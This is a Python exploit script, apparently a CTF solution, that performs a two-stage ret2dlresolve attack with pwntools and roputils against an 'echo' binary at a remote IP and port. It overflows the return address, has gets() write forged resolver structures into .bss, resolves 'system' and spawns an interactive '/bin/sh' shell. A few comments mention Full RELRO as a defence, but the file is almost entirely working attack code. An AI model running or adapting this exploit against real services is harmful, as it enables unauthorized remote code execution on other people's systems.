ret2resolve
exp
import sys
import roputils
from pwn import *
# Two-stage ret2dlresolve payload against the './echo' binary, driven over a
# remote connection (pwntools for I/O, roputils for payload construction).
# Stage 1 returns into gets() to read stage 2 into .bss and then enters the
# dynamic linker's lazy-resolution path with forged resolver data; stage 2
# supplies the "/bin/sh" string and the forged structures naming 'system'.
# Defensive note: this technique depends on lazy binding and a writable GOT;
# building the target with Full RELRO (-z relro -z now) removes that path,
# and the initial overwrite itself is what stack protection would have to
# catch (the overflow vector is not shown on this page).
context.log_level = 'debug'  # log every byte sent/received so the payload layout can be inspected
#r = process("./pwn")
p = remote("111.198.29.45",37888)  # target host/port as given by the page (likely a CTF service)
rop = roputils.ROP('./echo')  # parses the local copy of the target ELF for sections/symbols
addr_bss = rop.section('.bss')  # writable, fixed address used as scratch space for stage 2
offset = 0x3e  # bytes to fill before the saved return address — assumed from retfill(); TODO confirm against the binary
buf = rop.retfill(offset)  # padding up to the return address (per roputils' retfill contract)
buf += rop.call('gets',addr_bss)# addr_bss is the argument passed to gets (stage 2 lands here)
buf += rop.dl_resolve_call(addr_bss+20, addr_bss)# 20 is the length of the fake stack; forged resolver data at addr_bss+20, argument addr_bss
p.sendline(buf)  # stage 1
buf = rop.string('/bin/sh')  # NUL-terminated string placed at addr_bss
buf += rop.fill(20, buf)  # pad so the forged structures start at addr_bss+20, matching the call above
buf += rop.dl_resolve_data(addr_bss+20, 'system')  # forged link-map/symbol/reloc data that resolves to 'system'
buf += rop.fill(100, buf)  # pad stage 2 to 100 bytes
p.recvuntil("\n")  # wait for the service's prompt/newline before sending stage 2
# NOTE(review): roputils dates from Python 2; with Python 3 pwntools the
# str/bytes mixing in sendline/recvuntil may need adjusting — confirm interpreter.
p.sendline(buf)  # stage 2, consumed by the gets() call queued in stage 1
p.interactive()